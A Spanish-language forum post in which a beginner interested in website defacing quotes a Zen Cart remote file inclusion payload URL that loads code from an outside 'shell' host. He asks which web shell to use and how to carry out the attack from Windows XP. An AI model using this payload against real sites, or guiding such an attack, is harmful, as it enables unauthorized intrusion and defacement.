wenas, que tal? he estado tratando de aprender hacerca del defacing, en un scan con SSS me consegui con este bug, "Zen Cart Multiple File Include Vulnerabilities" el cual me llveva a esto...
1._ "
Necesitas ser usuario para ver los enlaces
Crear Usuario Hacer Sesion"
2._ "/data/vulnerabilities/exploits/zencart-rfi.txt "
y por ultimo aqui... lo que importa
3._http://www.example.com/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://shell
ok, asi se llega al supuesto bug (imagino
)... ok, donde dice
Necesitas ser usuario para ver los enlaces
Crear Usuario Hacer Sesionwww.example.com
va la pag del atack, cierto?
y aqui va la
Necesitas ser usuario para ver los enlaces
Crear Usuario Hacer Sesion...
ahora, que shell debo usar? debo compilarla? esto son cosas que no tengo muy claro... tengo sistema oprativo winXP y es algo que me limita mucho aprender porque he visto muchos videos pero trabajan con linux... cambiar de sistema operativo es una opcion pero iniciar de cero no parece buena opcion... estoy tratando de iniciarme con liux a ver como me va, pero ahorita quiero aprender con XP... espero su respuesta, gracias....
PD: estoy en busca de un tutor para amedida que este aprendiendo preguntar por privado y no postear quizas cosas insignificantes... gracias...
[/url]
Autor